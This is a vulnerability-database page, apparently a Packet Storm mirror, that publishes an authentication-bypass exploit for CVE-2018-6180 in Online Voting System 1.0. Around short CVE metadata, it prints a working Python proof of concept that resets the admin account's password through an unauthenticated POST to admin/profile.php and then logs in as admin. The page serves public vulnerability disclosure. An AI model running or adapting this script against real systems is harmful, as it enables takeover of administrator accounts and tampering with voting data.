Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormGiulio ComiPACKETSTORM:146254
HistoryFeb 05, 2018 - 12:00 a.m.

Online Voting System Authentication Bypass

2018-02-0500:00:00
Giulio Comi
packetstormsecurity.com
17

0.141 Low

EPSS

Percentile

95.7%

JSON
`# Exploit Title: Online Voting System - Authentication Bypass  
# Date: 02.02.2018  
# Vendor Homepage: http://themashabrand.com  
# Software Link: http://themashabrand.com/p/votin  
# Demo: http://localhost/Onlinevoting  
# Version: 1.0  
# Category: Webapps  
# Exploit Author: Giulio Comi  
# CVE : CVE-2018-6180  
  
  
#Description  
  
A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application.  
  
The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account.  
  
# Proof of Concept:  
  
#!/usr/bin/env python  
import requests  
from time import sleep  
from lxml import html  
  
  
def own(auth_bypass_request):  
"""  
Reset the password of a user just knowing his id  
"""  
url_edit_password = "admin/profile.php"  
  
payload = {  
'id': 1,  
'admin': 'admin', # overwrite the username of the victim  
'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim  
'edit': ''  
}  
  
response = auth_bypass_request.post(target_site + url_edit_password, data=payload)  
  
# Parse response to check if the request was successful  
check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()')  
  
return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]()  
  
  
def login(login_request):  
"""  
Enjoy the new password chosen for the victim  
"""  
credentials = {'username': 'admin',  
'password': "ARBITRARY_PASSWORD",  
'usertype': 'admin',  
'login': ''  
}  
  
response = login_request.post(target_site, data=credentials)  
  
print(response.text)  
  
  
if __name__ == "__main__":  
  
target_site = "http://localhost/Onlinevoting/"  
request = requests.Session()  
if own(request):  
sleep(4) # just a bit of delay  
login(request)  
else:  
print('Maybe the given id is not registered in the application')  
  
  
`

Related

nvd 1
zdt 1
cvelist 1
cve 1
prion 1
exploitpack 1
exploitdb 1
nvd
nvd
CVE-2018-6180
2018-02-08 23:29:01
zdt
zdt
Online Voting System - Authentication Bypass Exploit
2018-02-05 00:00:00
cvelist
cvelist
CVE-2018-6180
2018-02-08 23:00:00
cve
cve
CVE-2018-6180
2018-02-08 23:29:01
prion
prion
Design/Logic Flaw
2018-02-08 23:29:00
exploitpack
exploitpack
Online Voting System - Authentication Bypass
2018-02-05 00:00:00
exploitdb
exploitdb
Online Voting System - Authentication Bypass
2018-02-05 00:00:00

0.141 Low

EPSS

Percentile

95.7%

JSON
Related for PACKETSTORM:146254
nvd1zdt1cvelist1cve1prion1exploitpack1exploitdb1